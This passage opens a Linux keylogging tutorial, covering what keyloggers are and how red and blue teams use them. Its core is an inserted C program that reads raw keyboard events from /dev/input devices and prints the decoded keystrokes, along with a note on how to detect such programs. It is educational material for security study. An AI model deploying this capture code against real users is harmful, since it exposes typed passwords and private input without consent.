In this first part of our Complete Guide to Keylogging in Linux, we will cover the basics of keylogging and why it matters for Linux security, then dive deeper into keylogging in userspace and demonstrate how a keylogger can be written for Linux by reading input events directly from the keyboard device.
What Is a Keylogger?
A keylogger is a program designed to monitor keyboard input, generally in a covert manner so that the person being monitored is unaware of the activity. Rather than reading typed text from an application, these programs generally observe lower-level keyboard events (e.g. key down, key up and autorepeat), and depending on their design they can run anywhere from kernel space to userspace.
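To make the "lower-level keyboard events" concrete, here is an added example (not code from the original article): a small C program that decodes the raw evdev records a userspace keylogger obtains by read()ing a Linux keyboard device node such as /dev/input/eventN. The function names decode_events, build_sample and keymap are my own, the key-code table covers only a US-layout subset, and the event sequence in build_sample is constructed by hand to stand in for bytes read from a real device (typing Shift+h, i, Enter, with an autorepeat and the EV_SYN markers the kernel emits between key events).

```c
/* Added example, not the article's own code: decode raw struct input_event
 * records from a Linux keyboard device, as a userspace keylogger does.
 * Build on Linux: gcc -Wall -o evdec evdec.c
 * Run on a real device (needs root or the "input" group): ./evdec /dev/input/event3
 * Run with no argument to decode the constructed sample instead. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <linux/input.h>   /* struct input_event, EV_KEY, EV_SYN, KEY_* */

/* Hypothetical minimal US-layout table: key code -> unshifted character, 0 = unmapped. */
static char keymap(unsigned short code) {
    static const char top[]    = "qwertyuiop";   /* KEY_Q..KEY_P = 16..25 */
    static const char home[]   = "asdfghjkl";    /* KEY_A..KEY_L = 30..38 */
    static const char bottom[] = "zxcvbnm";      /* KEY_Z..KEY_M = 44..50 */
    if (code >= KEY_Q && code <= KEY_P) return top[code - KEY_Q];
    if (code >= KEY_A && code <= KEY_L) return home[code - KEY_A];
    if (code >= KEY_Z && code <= KEY_M) return bottom[code - KEY_Z];
    if (code == KEY_SPACE) return ' ';
    if (code == KEY_ENTER) return '\n';
    return 0;
}

/* Modifier state must survive across read() calls, so it lives in a struct. */
struct decoder { int shift_held; };

/* Decode len bytes of input_event records. Appends printable keystrokes to
 * out (caller supplies a NUL-terminated buffer, at most outsz-1 chars kept).
 * Returns the number of key-down events (value == 1) seen, mapped or not. */
int decode_events(struct decoder *d, const unsigned char *buf, size_t len,
                  char *out, size_t outsz) {
    size_t used = strlen(out);
    int presses = 0;
    for (size_t off = 0; off + sizeof(struct input_event) <= len;
         off += sizeof(struct input_event)) {
        struct input_event ev;
        memcpy(&ev, buf + off, sizeof ev);     /* no alignment assumptions on buf */
        if (ev.type != EV_KEY) continue;        /* EV_SYN, EV_MSC etc. are not keys */
        if (ev.code == KEY_LEFTSHIFT || ev.code == KEY_RIGHTSHIFT) {
            d->shift_held = (ev.value != 0);    /* 1 = down, 2 = autorepeat, 0 = up */
            if (ev.value == 1) presses++;
            continue;
        }
        if (ev.value != 1) continue;            /* record key-down only, skip repeat/release */
        presses++;
        char c = keymap(ev.code);
        if (c && used + 1 < outsz) {
            out[used++] = (d->shift_held && c >= 'a' && c <= 'z') ? (char)(c - 'a' + 'A') : c;
            out[used] = '\0';
        }
    }
    return presses;
}

/* Constructed sample: the bytes a read() would return while a user types
 * "Hi" and presses Enter (timestamps zeroed). Returns bytes written, 0 if cap too small. */
size_t build_sample(unsigned char *buf, size_t cap) {
    const struct { unsigned short type, code; int value; } seq[] = {
        { EV_KEY, KEY_LEFTSHIFT, 1 }, { EV_SYN, SYN_REPORT, 0 },
        { EV_KEY, KEY_H, 1 },         { EV_SYN, SYN_REPORT, 0 },
        { EV_KEY, KEY_H, 0 },         { EV_KEY, KEY_LEFTSHIFT, 0 },
        { EV_KEY, KEY_I, 1 },         { EV_KEY, KEY_I, 2 },  /* autorepeat: must not duplicate */
        { EV_KEY, KEY_I, 0 },
        { EV_KEY, KEY_ENTER, 1 },     { EV_KEY, KEY_ENTER, 0 },
    };
    size_t n = sizeof seq / sizeof seq[0];
    if (cap < n * sizeof(struct input_event)) return 0;
    for (size_t i = 0; i < n; i++) {
        struct input_event ev;
        memset(&ev, 0, sizeof ev);
        ev.type = seq[i].type; ev.code = seq[i].code; ev.value = seq[i].value;
        memcpy(buf + i * sizeof ev, &ev, sizeof ev);
    }
    return n * sizeof(struct input_event);
}

int main(int argc, char **argv) {
    unsigned char buf[64 * sizeof(struct input_event)];
    char text[256] = "";
    struct decoder d = { 0 };
    if (argc < 2) {                              /* no device given: use the sample */
        size_t len = build_sample(buf, sizeof buf);
        int n = decode_events(&d, buf, len, text, sizeof text);
        printf("%d key presses, text: %s", n, text);
        return 0;
    }
    int fd = open(argv[1], O_RDONLY);            /* e.g. /dev/input/event3 */
    if (fd < 0) { perror("open"); return 1; }
    for (;;) {
        ssize_t r = read(fd, buf, sizeof buf);   /* the kernel returns whole records */
        if (r <= 0) { if (r < 0 && errno == EINTR) continue; break; }
        text[0] = '\0';
        if (decode_events(&d, buf, (size_t)r, text, sizeof text) && text[0]) {
            fputs(text, stdout); fflush(stdout);
        }
    }
    close(fd);
    return 0;
}
```

Two details matter in practice: autorepeat records (value 2) must be dropped or every held key is logged many times, and modifier state has to be carried across reads because Shift-down and the letter it modifies usually arrive in different read() calls. The same fact is what a defender watches for: a process with no business reading input opening /dev/input/event* is the observable behaviour of this class of keylogger.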
Keylogging & Security
In a security context, such programs are used in security audit exercises commonly known as red team engagements. Red team operators use various attack tools to compromise a target system, move through the infrastructure, and capture sensitive data in order to find and expose gaps in the security monitoring of the target organization. Keyloggers are used to record account credentials, network credentials and similar secrets, which are then used for further infiltration of the infrastructure.
Why Is Studying a Keylogger Important?
For offensive security or red team:
- You understand multiple ways to implement a keylogger.
- You understand the various places where a keylogger can run (userspace, kernel, hypervisor etc.).
For defensive security or blue team:
- You understand the common places where a keylogger can hide.
- You understand the common APIs and methods that should be monitored to detect keyloggers based on their behaviour.
Keyboard and Linux